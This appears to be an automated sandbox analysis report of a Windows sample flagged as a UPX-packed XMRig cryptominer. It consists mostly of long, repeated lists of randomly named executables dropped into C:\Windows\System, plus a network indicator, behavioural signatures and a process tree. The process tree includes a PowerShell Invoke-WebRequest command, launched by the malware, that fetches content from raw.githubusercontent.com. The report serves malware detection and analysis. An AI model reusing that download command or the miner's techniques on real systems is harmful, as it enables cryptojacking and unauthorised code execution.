C:\Windows\System\YFLCyUA.exe

C:\Windows\System\ZHeGtII.exe

C:\Windows\System\ZHeGtII.exe

C:\Windows\System\qQJPWuM.exe

C:\Windows\System\qQJPWuM.exe

C:\Windows\System\oTlYZMY.exe

C:\Windows\System\oTlYZMY.exe

C:\Windows\System\mktgGVE.exe

C:\Windows\System\mktgGVE.exe

C:\Windows\System\iBPZOwY.exe

C:\Windows\System\iBPZOwY.exe

C:\Windows\System\XAqLJrJ.exe

C:\Windows\System\XAqLJrJ.exe

C:\Windows\System\QEMtKuE.exe

C:\Windows\System\QEMtKuE.exe

C:\Windows\System\LWLZoKW.exe

C:\Windows\System\LWLZoKW.exe

C:\Windows\System\WJRvJlE.exe

C:\Windows\System\WJRvJlE.exe

C:\Windows\System\IgDDAuK.exe

C:\Windows\System\IgDDAuK.exe

C:\Windows\System\SVudCkN.exe

C:\Windows\System\SVudCkN.exe

C:\Windows\System\gjsuELG.exe

C:\Windows\System\gjsuELG.exe

C:\Windows\System\BEICCQO.exe

C:\Windows\System\BEICCQO.exe

C:\Windows\System\exVeVxD.exe

C:\Windows\System\exVeVxD.exe

C:\Windows\System\DxVrMRX.exe

C:\Windows\System\DxVrMRX.exe

C:\Windows\System\SIRHLlD.exe

C:\Windows\System\SIRHLlD.exe

C:\Windows\System\vrxwdwR.exe

C:\Windows\System\vrxwdwR.exe

C:\Windows\System\xeSbZVJ.exe

C:\Windows\System\xeSbZVJ.exe

C:\Windows\System\vcRdwGw.exe

C:\Windows\System\vcRdwGw.exe

C:\Windows\System\SwcTFuU.exe

C:\Windows\System\SwcTFuU.exe

C:\Windows\System\ALdRBlm.exe

C:\Windows\System\ALdRBlm.exe

C:\Windows\System\bWQtlDZ.exe

C:\Windows\System\bWQtlDZ.exe

C:\Windows\System\GBxBiqw.exe

C:\Windows\System\GBxBiqw.exe

C:\Windows\System\KiBKvda.exe

C:\Windows\System\KiBKvda.exe

C:\Windows\System\wBLyTiT.exe

C:\Windows\System\wBLyTiT.exe

C:\Windows\System\KjdFmAH.exe

C:\Windows\System\KjdFmAH.exe

C:\Windows\System\aPjerKB.exe

C:\Windows\System\aPjerKB.exe

C:\Windows\System\HPnAPFc.exe

C:\Windows\System\HPnAPFc.exe

C:\Windows\System\vkcuuvY.exe

C:\Windows\System\vkcuuvY.exe

C:\Windows\System\abCBLXW.exe

C:\Windows\System\abCBLXW.exe

C:\Windows\System\FsZqPTu.exe

C:\Windows\System\FsZqPTu.exe

C:\Windows\System\lPvIaiT.exe

C:\Windows\System\lPvIaiT.exe

C:\Windows\System\BXTwoDU.exe

C:\Windows\System\BXTwoDU.exe

C:\Windows\System\aUqhfUC.exe

C:\Windows\System\aUqhfUC.exe

C:\Windows\System\rrZhAVf.exe

C:\Windows\System\rrZhAVf.exe

C:\Windows\System\yMsprYY.exe

C:\Windows\System\yMsprYY.exe

C:\Windows\System\BYYcVRc.exe

C:\Windows\System\BYYcVRc.exe

C:\Windows\System\RkRjeNW.exe

C:\Windows\System\RkRjeNW.exe

C:\Windows\System\RitiLis.exe

C:\Windows\System\RitiLis.exe

C:\Windows\System\sfxgCbe.exe

C:\Windows\System\sfxgCbe.exe

C:\Windows\System\vqHACiz.exe

C:\Windows\System\vqHACiz.exe

C:\Windows\System\uILyQIg.exe

C:\Windows\System\uILyQIg.exe

C:\Windows\System\KCdRNev.exe

C:\Windows\System\KCdRNev.exe

C:\Windows\System\vkXwqDe.exe

C:\Windows\System\vkXwqDe.exe

C:\Windows\System\NccoQSt.exe

C:\Windows\System\NccoQSt.exe

C:\Windows\System\bZzUzBG.exe

C:\Windows\System\bZzUzBG.exe

C:\Windows\System\FWxBKMR.exe

C:\Windows\System\FWxBKMR.exe

C:\Windows\System\HGwWtxV.exe

C:\Windows\System\HGwWtxV.exe

C:\Windows\System\DGMfLsi.exe

C:\Windows\System\DGMfLsi.exe

C:\Windows\System\aaSGSTt.exe

C:\Windows\System\aaSGSTt.exe

C:\Windows\System\UUlfSsM.exe

C:\Windows\System\UUlfSsM.exe

C:\Windows\System\AQaGHCU.exe

C:\Windows\System\AQaGHCU.exe

C:\Windows\System\crKSrdK.exe

C:\Windows\System\crKSrdK.exe

C:\Windows\System\WSOGzXx.exe

C:\Windows\System\WSOGzXx.exe

C:\Windows\System\hOAzOGL.exe

C:\Windows\System\hOAzOGL.exe

C:\Windows\System\NVDShXM.exe

C:\Windows\System\NVDShXM.exe

C:\Windows\System\LeoNtcJ.exe

C:\Windows\System\LeoNtcJ.exe

C:\Windows\System\gplVQGV.exe

C:\Windows\System\gplVQGV.exe

C:\Windows\System\lcwPLsJ.exe

C:\Windows\System\lcwPLsJ.exe

C:\Windows\System\hOKziiz.exe

C:\Windows\System\hOKziiz.exe

C:\Windows\System\UgsIAaw.exe

C:\Windows\System\UgsIAaw.exe

C:\Windows\System\aMZyiqv.exe

C:\Windows\System\aMZyiqv.exe

C:\Windows\System\YibnwNO.exe

C:\Windows\System\YibnwNO.exe

C:\Windows\System\UOWZrMh.exe

C:\Windows\System\UOWZrMh.exe

C:\Windows\System\ybvGlFv.exe

C:\Windows\System\ybvGlFv.exe

C:\Windows\System\YejAeSz.exe

C:\Windows\System\YejAeSz.exe

C:\Windows\System\IFJXxoZ.exe

C:\Windows\System\IFJXxoZ.exe

C:\Windows\System\rxiMnbx.exe

C:\Windows\System\rxiMnbx.exe

C:\Windows\System\bSRXWhx.exe

C:\Windows\System\bSRXWhx.exe

C:\Windows\System\jYkkyyj.exe

C:\Windows\System\jYkkyyj.exe

C:\Windows\System\VuJNiuv.exe

C:\Windows\System\VuJNiuv.exe

C:\Windows\System\OPFnGti.exe

C:\Windows\System\OPFnGti.exe

C:\Windows\System\OJYCKPe.exe

C:\Windows\System\OJYCKPe.exe

C:\Windows\System\SMtejpV.exe

C:\Windows\System\SMtejpV.exe

C:\Windows\System\XRbQBQo.exe

C:\Windows\System\XRbQBQo.exe

C:\Windows\System\enjpIJn.exe

C:\Windows\System\enjpIJn.exe

C:\Windows\System\xdRGeHy.exe

C:\Windows\System\xdRGeHy.exe

C:\Windows\System\pLziKrd.exe

C:\Windows\System\pLziKrd.exe

C:\Windows\System\vjwAauu.exe

C:\Windows\System\vjwAauu.exe

C:\Windows\System\HNTmGbf.exe

C:\Windows\System\HNTmGbf.exe

C:\Windows\System\uBeBsJk.exe

C:\Windows\System\uBeBsJk.exe

C:\Windows\System\ounBXPT.exe

C:\Windows\System\ounBXPT.exe

C:\Windows\System\kMHylSA.exe

C:\Windows\System\kMHylSA.exe

C:\Windows\System\ybxdxAJ.exe

C:\Windows\System\ybxdxAJ.exe

C:\Windows\System\wZkwpCt.exe

C:\Windows\System\wZkwpCt.exe

C:\Windows\System\JMSZrwb.exe

C:\Windows\System\JMSZrwb.exe

C:\Windows\System\sjoOwQj.exe

C:\Windows\System\sjoOwQj.exe

C:\Windows\System\nEPggxi.exe

C:\Windows\System\nEPggxi.exe

C:\Windows\System\XHvzwUl.exe

C:\Windows\System\XHvzwUl.exe

C:\Windows\System\RGRLStH.exe

C:\Windows\System\RGRLStH.exe

C:\Windows\System\LYlPqRN.exe

C:\Windows\System\LYlPqRN.exe

C:\Windows\System\oOgirRC.exe

C:\Windows\System\oOgirRC.exe

C:\Windows\System\HLHBrCj.exe

C:\Windows\System\HLHBrCj.exe

C:\Windows\System\xOpghNx.exe

C:\Windows\System\xOpghNx.exe

C:\Windows\System\qmebpHi.exe

C:\Windows\System\qmebpHi.exe

C:\Windows\System\SsOUWDk.exe

C:\Windows\System\SsOUWDk.exe

C:\Windows\System\QIZZTSp.exe

C:\Windows\System\QIZZTSp.exe

C:\Windows\System\pyoFYgV.exe

C:\Windows\System\pyoFYgV.exe

C:\Windows\System\fWHfcgj.exe

C:\Windows\System\fWHfcgj.exe

C:\Windows\System\nIjYlqJ.exe

C:\Windows\System\nIjYlqJ.exe

C:\Windows\System\DhCueoa.exe

C:\Windows\System\DhCueoa.exe

C:\Windows\System\HIvUlJp.exe

C:\Windows\System\HIvUlJp.exe

C:\Windows\System\SjMykpv.exe

C:\Windows\System\SjMykpv.exe

C:\Windows\System\KulwQUV.exe

C:\Windows\System\KulwQUV.exe

C:\Windows\System\zxZyAnE.exe

C:\Windows\System\zxZyAnE.exe

C:\Windows\System\ztyGDlM.exe

C:\Windows\System\ztyGDlM.exe

C:\Windows\System\gSKZOmf.exe

C:\Windows\System\gSKZOmf.exe

C:\Windows\System\TAbMlUs.exe

C:\Windows\System\TAbMlUs.exe

C:\Windows\System\oLPjdMx.exe

C:\Windows\System\oLPjdMx.exe

C:\Windows\System\wtmzgau.exe

C:\Windows\System\wtmzgau.exe

C:\Windows\System\HZdAEHp.exe

C:\Windows\System\HZdAEHp.exe

C:\Windows\System\yHKRmIN.exe

C:\Windows\System\yHKRmIN.exe

C:\Windows\System\xxVGwjT.exe

C:\Windows\System\xxVGwjT.exe

C:\Windows\System\KAtDNWH.exe

C:\Windows\System\KAtDNWH.exe

C:\Windows\System\IqJbvgG.exe

C:\Windows\System\IqJbvgG.exe

C:\Windows\System\FyeUQVh.exe

C:\Windows\System\FyeUQVh.exe

C:\Windows\System\adMCAXi.exe

C:\Windows\System\adMCAXi.exe

C:\Windows\System\pdvSNZz.exe

C:\Windows\System\pdvSNZz.exe

C:\Windows\System\bnSwpMd.exe

C:\Windows\System\bnSwpMd.exe

C:\Windows\System\tcLyrjj.exe

C:\Windows\System\tcLyrjj.exe

C:\Windows\System\brSqjLb.exe

C:\Windows\System\brSqjLb.exe

C:\Windows\System\VeBkTln.exe

C:\Windows\System\VeBkTln.exe

C:\Windows\System\jlOAQEi.exe

C:\Windows\System\jlOAQEi.exe

C:\Windows\System\paoTFAv.exe

C:\Windows\System\paoTFAv.exe

C:\Windows\System\DaZNFle.exe

C:\Windows\System\DaZNFle.exe

C:\Windows\System\QSqbcrh.exe

C:\Windows\System\QSqbcrh.exe

C:\Windows\System\XpJuOas.exe

C:\Windows\System\XpJuOas.exe

C:\Windows\System\CIsVdHf.exe

C:\Windows\System\CIsVdHf.exe

C:\Windows\System\ImasHOC.exe

C:\Windows\System\ImasHOC.exe

C:\Windows\System\bPfYVOi.exe

C:\Windows\System\bPfYVOi.exe

C:\Windows\System\Xvwfamt.exe

C:\Windows\System\Xvwfamt.exe

C:\Windows\System\FAMWaJR.exe

C:\Windows\System\FAMWaJR.exe

C:\Windows\System\KIOuqlX.exe

C:\Windows\System\KIOuqlX.exe

C:\Windows\System\KEjNXGT.exe

C:\Windows\System\KEjNXGT.exe

C:\Windows\System\WizhJhH.exe

C:\Windows\System\WizhJhH.exe

C:\Windows\System\PUjddVo.exe

C:\Windows\System\PUjddVo.exe

C:\Windows\System\WehUdYv.exe

C:\Windows\System\WehUdYv.exe

C:\Windows\System\umNDlvP.exe

C:\Windows\System\umNDlvP.exe

C:\Windows\System\bVohUFl.exe

C:\Windows\System\bVohUFl.exe

C:\Windows\System\ItYOiDy.exe

C:\Windows\System\ItYOiDy.exe

C:\Windows\System\jzWgTMQ.exe

C:\Windows\System\jzWgTMQ.exe

C:\Windows\System\NBEEsvv.exe

C:\Windows\System\NBEEsvv.exe

C:\Windows\System\dMRkrLL.exe

C:\Windows\System\dMRkrLL.exe

C:\Windows\System\rlJlSLw.exe

C:\Windows\System\rlJlSLw.exe

C:\Windows\System\iEhuxSz.exe

C:\Windows\System\iEhuxSz.exe


Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 16:12

Reported

2024-06-10 16:15

Platform

win10v2004-20240426-en

Max time kernel

92s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory


Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2372 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\EdbYdrc.exe

C:\Windows\System\EdbYdrc.exe

C:\Windows\System\YlnWulC.exe

C:\Windows\System\YlnWulC.exe

C:\Windows\System\cotUXIQ.exe

C:\Windows\System\cotUXIQ.exe

C:\Windows\System\ZZlWTaj.exe

C:\Windows\System\ZZlWTaj.exe

C:\Windows\System\SeBFalb.exe

C:\Windows\System\SeBFalb.exe

C:\Windows\System\MNdBXCt.exe

C:\Windows\System\MNdBXCt.exe

C:\Windows\System\QrFksth.exe

C:\Windows\System\QrFksth.exe

C:\Windows\System\HSVsTFS.exe

C:\Windows\System\HSVsTFS.exe

C:\Windows\System\gFImeTX.exe

C:\Windows\System\gFImeTX.exe

C:\Windows\System\oLmgSmv.exe

C:\Windows\System\oLmgSmv.exe

C:\Windows\System\REShIXW.exe

C:\Windows\System\REShIXW.exe

C:\Windows\System\GpFyGlp.exe

C:\Windows\System\GpFyGlp.exe

C:\Windows\System\EhVKCIZ.exe

C:\Windows\System\EhVKCIZ.exe

C:\Windows\System\nZECNsO.exe

C:\Windows\System\nZECNsO.exe

C:\Windows\System\HlfeWgs.exe

C:\Windows\System\HlfeWgs.exe

C:\Windows\System\YoLDEwC.exe

C:\Windows\System\YoLDEwC.exe

C:\Windows\System\mSTDsqz.exe

C:\Windows\System\mSTDsqz.exe

C:\Windows\System\YARANBa.exe

C:\Windows\System\YARANBa.exe

C:\Windows\System\vvrkkKY.exe

C:\Windows\System\vvrkkKY.exe

C:\Windows\System\zsCreGY.exe

C:\Windows\System\zsCreGY.exe

C:\Windows\System\zAtjFeS.exe

C:\Windows\System\zAtjFeS.exe

C:\Windows\System\eeQXNVE.exe

C:\Windows\System\eeQXNVE.exe

C:\Windows\System\NcCCqaq.exe

C:\Windows\System\NcCCqaq.exe

C:\Windows\System\QkSdXbK.exe

C:\Windows\System\QkSdXbK.exe

C:\Windows\System\rCLWoFD.exe

C:\Windows\System\rCLWoFD.exe

C:\Windows\System\ruoABIA.exe

C:\Windows\System\ruoABIA.exe

C:\Windows\System\sQVezPW.exe

C:\Windows\System\sQVezPW.exe

C:\Windows\System\dkvZSRV.exe

C:\Windows\System\dkvZSRV.exe

C:\Windows\System\LUYBHhx.exe

C:\Windows\System\LUYBHhx.exe

C:\Windows\System\zMDnVND.exe

C:\Windows\System\zMDnVND.exe

C:\Windows\System\nUCetjB.exe

C:\Windows\System\nUCetjB.exe

C:\Windows\System\sDNaFoD.exe

C:\Windows\System\sDNaFoD.exe

C:\Windows\System\PlVnFNv.exe

C:\Windows\System\PlVnFNv.exe

C:\Windows\System\BYuGkSR.exe

C:\Windows\System\BYuGkSR.exe

C:\Windows\System\Lqsmvtr.exe

C:\Windows\System\Lqsmvtr.exe

C:\Windows\System\yGGDmPl.exe

C:\Windows\System\yGGDmPl.exe

C:\Windows\System\relPIyB.exe

C:\Windows\System\relPIyB.exe

C:\Windows\System\IlCFiPu.exe

C:\Windows\System\IlCFiPu.exe

C:\Windows\System\mONUkLr.exe

C:\Windows\System\mONUkLr.exe

C:\Windows\System\hfVMYxw.exe

C:\Windows\System\hfVMYxw.exe

C:\Windows\System\cZAVTSU.exe

C:\Windows\System\cZAVTSU.exe

C:\Windows\System\IXxembR.exe

C:\Windows\System\IXxembR.exe

C:\Windows\System\CiQXSTE.exe

C:\Windows\System\CiQXSTE.exe

C:\Windows\System\lxXaYtu.exe

C:\Windows\System\lxXaYtu.exe

C:\Windows\System\yTXEDBo.exe

C:\Windows\System\yTXEDBo.exe

C:\Windows\System\OQjtXby.exe

C:\Windows\System\OQjtXby.exe

C:\Windows\System\vKJVatD.exe

C:\Windows\System\vKJVatD.exe

C:\Windows\System\VNTQXaL.exe

C:\Windows\System\VNTQXaL.exe

C:\Windows\System\vcnyKOJ.exe

C:\Windows\System\vcnyKOJ.exe

C:\Windows\System\DoFkCLL.exe

C:\Windows\System\DoFkCLL.exe

C:\Windows\System\qGsoSPD.exe

C:\Windows\System\qGsoSPD.exe

C:\Windows\System\mhROXXz.exe

C:\Windows\System\mhROXXz.exe

C:\Windows\System\iihVact.exe

C:\Windows\System\iihVact.exe

C:\Windows\System\UAeCufN.exe

C:\Windows\System\UAeCufN.exe

C:\Windows\System\QbjNnWz.exe

C:\Windows\System\QbjNnWz.exe

C:\Windows\System\bPNUeFe.exe

C:\Windows\System\bPNUeFe.exe

C:\Windows\System\KMinFMG.exe

C:\Windows\System\KMinFMG.exe

C:\Windows\System\qSAFAwI.exe

C:\Windows\System\qSAFAwI.exe

C:\Windows\System\JFNFAqN.exe

C:\Windows\System\JFNFAqN.exe

C:\Windows\System\LBjpOmR.exe

C:\Windows\System\LBjpOmR.exe

C:\Windows\System\nNiJSjW.exe

C:\Windows\System\nNiJSjW.exe

C:\Windows\System\qOKODCl.exe

C:\Windows\System\qOKODCl.exe

C:\Windows\System\WuMkooy.exe

C:\Windows\System\WuMkooy.exe

C:\Windows\System\JaNJLLj.exe

C:\Windows\System\JaNJLLj.exe

C:\Windows\System\wExFjRr.exe

C:\Windows\System\wExFjRr.exe

C:\Windows\System\vaKnkal.exe

C:\Windows\System\vaKnkal.exe

C:\Windows\System\lnZsFzU.exe

C:\Windows\System\lnZsFzU.exe

C:\Windows\System\mqifCGX.exe

C:\Windows\System\mqifCGX.exe

C:\Windows\System\AksFnLl.exe

C:\Windows\System\AksFnLl.exe

C:\Windows\System\BujIunM.exe

C:\Windows\System\BujIunM.exe

C:\Windows\System\CuanSLB.exe

C:\Windows\System\CuanSLB.exe

C:\Windows\System\KASEwkN.exe

C:\Windows\System\KASEwkN.exe

C:\Windows\System\qkVHypD.exe

C:\Windows\System\qkVHypD.exe

C:\Windows\System\yAqvlDw.exe

C:\Windows\System\yAqvlDw.exe

C:\Windows\System\qjYfLRd.exe

C:\Windows\System\qjYfLRd.exe

C:\Windows\System\kEYIFbR.exe

C:\Windows\System\kEYIFbR.exe

C:\Windows\System\qOsVLZp.exe

C:\Windows\System\qOsVLZp.exe

C:\Windows\System\fhSsfcw.exe

C:\Windows\System\fhSsfcw.exe

C:\Windows\System\xtgPNez.exe

C:\Windows\System\xtgPNez.exe

C:\Windows\System\BJrgICN.exe

C:\Windows\System\BJrgICN.exe

C:\Windows\System\YTiRsZY.exe

C:\Windows\System\YTiRsZY.exe

C:\Windows\System\tiTMGib.exe

C:\Windows\System\tiTMGib.exe

C:\Windows\System\UBBSGLe.exe

C:\Windows\System\UBBSGLe.exe

C:\Windows\System\jcBmQJr.exe

C:\Windows\System\jcBmQJr.exe

C:\Windows\System\bvGBgEC.exe

C:\Windows\System\bvGBgEC.exe

C:\Windows\System\RNrqCet.exe

C:\Windows\System\RNrqCet.exe

C:\Windows\System\dgIkznA.exe

C:\Windows\System\dgIkznA.exe

C:\Windows\System\bWgwNEx.exe

C:\Windows\System\bWgwNEx.exe

C:\Windows\System\eWwzxiY.exe

C:\Windows\System\eWwzxiY.exe

C:\Windows\System\hRaqIhE.exe

C:\Windows\System\hRaqIhE.exe

C:\Windows\System\KneDXcd.exe

C:\Windows\System\KneDXcd.exe

C:\Windows\System\BskoovH.exe

C:\Windows\System\BskoovH.exe

C:\Windows\System\nFnFenH.exe

C:\Windows\System\nFnFenH.exe

C:\Windows\System\uIYmSLz.exe

C:\Windows\System\uIYmSLz.exe

C:\Windows\System\FSSjEKX.exe

C:\Windows\System\FSSjEKX.exe

C:\Windows\System\BrIAeGb.exe

C:\Windows\System\BrIAeGb.exe

C:\Windows\System\VmnEdTP.exe

C:\Windows\System\VmnEdTP.exe

C:\Windows\System\msfHPEO.exe

C:\Windows\System\msfHPEO.exe

C:\Windows\System\dOPGqma.exe

C:\Windows\System\dOPGqma.exe

C:\Windows\System\XbqqWZF.exe

C:\Windows\System\XbqqWZF.exe

C:\Windows\System\osxidxh.exe

C:\Windows\System\osxidxh.exe

C:\Windows\System\DEUbDPK.exe

C:\Windows\System\DEUbDPK.exe

C:\Windows\System\fVvPidN.exe

C:\Windows\System\fVvPidN.exe

C:\Windows\System\IGFDKmv.exe

C:\Windows\System\IGFDKmv.exe

C:\Windows\System\pNriTZc.exe

C:\Windows\System\pNriTZc.exe

C:\Windows\System\naUDaiW.exe

C:\Windows\System\naUDaiW.exe

C:\Windows\System\qjGYYAV.exe

C:\Windows\System\qjGYYAV.exe

C:\Windows\System\lSPImnQ.exe

C:\Windows\System\lSPImnQ.exe

C:\Windows\System\NFWlqkB.exe

C:\Windows\System\NFWlqkB.exe

C:\Windows\System\mUTgJhb.exe

C:\Windows\System\mUTgJhb.exe

C:\Windows\System\eENwziG.exe

C:\Windows\System\eENwziG.exe

C:\Windows\System\hpQZvMY.exe

C:\Windows\System\hpQZvMY.exe

C:\Windows\System\TXOTJwc.exe

C:\Windows\System\TXOTJwc.exe

C:\Windows\System\bmDVzUO.exe

C:\Windows\System\bmDVzUO.exe

C:\Windows\System\OJxSpCF.exe

C:\Windows\System\OJxSpCF.exe

C:\Windows\System\ypWKaPZ.exe

C:\Windows\System\ypWKaPZ.exe

C:\Windows\System\hdrbdSs.exe

C:\Windows\System\hdrbdSs.exe

C:\Windows\System\BRusCEI.exe

C:\Windows\System\BRusCEI.exe

C:\Windows\System\ebHPPEY.exe

C:\Windows\System\ebHPPEY.exe

C:\Windows\System\gGusugx.exe

C:\Windows\System\gGusugx.exe

C:\Windows\System\lFKsiHS.exe

C:\Windows\System\lFKsiHS.exe

C:\Windows\System\MvJVgXA.exe

C:\Windows\System\MvJVgXA.exe

C:\Windows\System\oXrseWx.exe

C:\Windows\System\oXrseWx.exe

C:\Windows\System\hAkPbUJ.exe

C:\Windows\System\hAkPbUJ.exe

C:\Windows\System\bzofvlI.exe

C:\Windows\System\bzofvlI.exe

C:\Windows\System\VidmRmZ.exe

C:\Windows\System\VidmRmZ.exe

C:\Windows\System\FpfnJNw.exe

C:\Windows\System\FpfnJNw.exe

C:\Windows\System\lJObAix.exe

C:\Windows\System\lJObAix.exe

C:\Windows\System\AjYYHKh.exe

C:\Windows\System\AjYYHKh.exe

C:\Windows\System\XOFVKgh.exe

C:\Windows\System\XOFVKgh.exe

C:\Windows\System\iHediqG.exe

C:\Windows\System\iHediqG.exe

C:\Windows\System\nkwbOmi.exe

C:\Windows\System\nkwbOmi.exe

C:\Windows\System\jtZYnHk.exe

C:\Windows\System\jtZYnHk.exe

C:\Windows\System\ePtdmfq.exe

C:\Windows\System\ePtdmfq.exe

C:\Windows\System\RsUBUyu.exe

C:\Windows\System\RsUBUyu.exe

C:\Windows\System\xVmRwoE.exe

C:\Windows\System\xVmRwoE.exe

C:\Windows\System\zkTWuaW.exe

C:\Windows\System\zkTWuaW.exe

C:\Windows\System\igoiXca.exe

C:\Windows\System\igoiXca.exe

C:\Windows\System\ofqHMuY.exe

C:\Windows\System\ofqHMuY.exe

C:\Windows\System\NPQVyYF.exe

C:\Windows\System\NPQVyYF.exe

C:\Windows\System\WyNIYSS.exe

C:\Windows\System\WyNIYSS.exe

C:\Windows\System\XShsevN.exe

C:\Windows\System\XShsevN.exe

C:\Windows\System\tcEwcdK.exe

C:\Windows\System\tcEwcdK.exe

C:\Windows\System\oFCxQUB.exe

C:\Windows\System\oFCxQUB.exe

C:\Windows\System\mlqRiDE.exe

C:\Windows\System\mlqRiDE.exe

C:\Windows\System\wDvhjfJ.exe

C:\Windows\System\wDvhjfJ.exe

C:\Windows\System\wBMVJLX.exe

C:\Windows\System\wBMVJLX.exe

C:\Windows\System\LhBbrit.exe

C:\Windows\System\LhBbrit.exe

C:\Windows\System\JelHbvL.exe

C:\Windows\System\JelHbvL.exe

C:\Windows\System\AcbEpLF.exe

C:\Windows\System\AcbEpLF.exe

C:\Windows\System\nLoFsdH.exe

C:\Windows\System\nLoFsdH.exe

C:\Windows\System\ZagifGG.exe

C:\Windows\System\ZagifGG.exe

C:\Windows\System\orKRXDk.exe

C:\Windows\System\orKRXDk.exe

C:\Windows\System\kPDtebl.exe

C:\Windows\System\kPDtebl.exe

C:\Windows\System\jnPVQgz.exe

C:\Windows\System\jnPVQgz.exe

C:\Windows\System\xaphbts.exe

C:\Windows\System\xaphbts.exe

C:\Windows\System\YVRWAPB.exe

C:\Windows\System\YVRWAPB.exe

C:\Windows\System\VsBAMMG.exe

C:\Windows\System\VsBAMMG.exe

C:\Windows\System\hPEQCJh.exe

C:\Windows\System\hPEQCJh.exe

C:\Windows\System\gCHaaKf.exe

C:\Windows\System\gCHaaKf.exe

C:\Windows\System\nQWqDUW.exe

C:\Windows\System\nQWqDUW.exe

C:\Windows\System\hYHBAbU.exe

C:\Windows\System\hYHBAbU.exe

C:\Windows\System\FbqNHCP.exe

C:\Windows\System\FbqNHCP.exe

C:\Windows\System\oRKKjGT.exe

C:\Windows\System\oRKKjGT.exe

C:\Windows\System\axodYFi.exe

C:\Windows\System\axodYFi.exe

C:\Windows\System\KofPmTe.exe

C:\Windows\System\KofPmTe.exe

C:\Windows\System\YjDyzxM.exe

C:\Windows\System\YjDyzxM.exe

C:\Windows\System\NYEOgcz.exe

C:\Windows\System\NYEOgcz.exe

C:\Windows\System\SpjOAfW.exe

C:\Windows\System\SpjOAfW.exe

C:\Windows\System\UYFgHqw.exe

C:\Windows\System\UYFgHqw.exe

C:\Windows\System\JxhMsJh.exe

C:\Windows\System\JxhMsJh.exe

C:\Windows\System\YonLOzA.exe

C:\Windows\System\YonLOzA.exe

C:\Windows\System\GDeeRUC.exe

C:\Windows\System\GDeeRUC.exe

C:\Windows\System\KyoEBOr.exe

C:\Windows\System\KyoEBOr.exe

C:\Windows\System\fJUzsQp.exe

C:\Windows\System\fJUzsQp.exe

C:\Windows\System\nRkqaKq.exe

C:\Windows\System\nRkqaKq.exe

C:\Windows\System\WryqNCk.exe

C:\Windows\System\WryqNCk.exe

C:\Windows\System\cqJxoSa.exe

C:\Windows\System\cqJxoSa.exe

C:\Windows\System\ORuuSPd.exe

C:\Windows\System\ORuuSPd.exe

C:\Windows\System\GnksXei.exe

C:\Windows\System\GnksXei.exe

C:\Windows\System\SGjdYRj.exe

C:\Windows\System\SGjdYRj.exe

C:\Windows\System\qDKpvFN.exe

C:\Windows\System\qDKpvFN.exe

C:\Windows\System\TJFQgzt.exe

C:\Windows\System\TJFQgzt.exe

C:\Windows\System\OdyNOJa.exe

C:\Windows\System\OdyNOJa.exe

C:\Windows\System\vWyMdNp.exe

C:\Windows\System\vWyMdNp.exe

C:\Windows\System\BGZqEfR.exe

C:\Windows\System\BGZqEfR.exe

C:\Windows\System\jtQqGCE.exe

C:\Windows\System\jtQqGCE.exe

C:\Windows\System\ytaPxqX.exe

C:\Windows\System\ytaPxqX.exe

C:\Windows\System\RtyiHvS.exe

C:\Windows\System\RtyiHvS.exe

C:\Windows\System\UvsUIVs.exe

C:\Windows\System\UvsUIVs.exe

C:\Windows\System\hshuZjX.exe

C:\Windows\System\hshuZjX.exe

C:\Windows\System\vMuSwWr.exe

C:\Windows\System\vMuSwWr.exe

C:\Windows\System\YIHSYfW.exe

C:\Windows\System\YIHSYfW.exe

C:\Windows\System\oqCHUTJ.exe

C:\Windows\System\oqCHUTJ.exe

C:\Windows\System\vdHxYvG.exe

C:\Windows\System\vdHxYvG.exe

C:\Windows\System\cmyMYVr.exe

C:\Windows\System\cmyMYVr.exe

C:\Windows\System\celPCfP.exe

C:\Windows\System\celPCfP.exe

C:\Windows\System\TRdcgvq.exe

C:\Windows\System\TRdcgvq.exe

C:\Windows\System\CxWgVyj.exe

C:\Windows\System\CxWgVyj.exe

C:\Windows\System\zFQaohw.exe

C:\Windows\System\zFQaohw.exe

C:\Windows\System\UJBblWI.exe

C:\Windows\System\UJBblWI.exe

C:\Windows\System\cEophjc.exe

C:\Windows\System\cEophjc.exe

C:\Windows\System\tHpqnak.exe

C:\Windows\System\tHpqnak.exe

C:\Windows\System\folbpkr.exe

C:\Windows\System\folbpkr.exe

C:\Windows\System\MNZLYRA.exe

C:\Windows\System\MNZLYRA.exe

C:\Windows\System\nxBWGaY.exe

C:\Windows\System\nxBWGaY.exe

C:\Windows\System\nSeJKKa.exe

C:\Windows\System\nSeJKKa.exe

C:\Windows\System\sUXizXd.exe

C:\Windows\System\sUXizXd.exe

C:\Windows\System\XgXraMe.exe

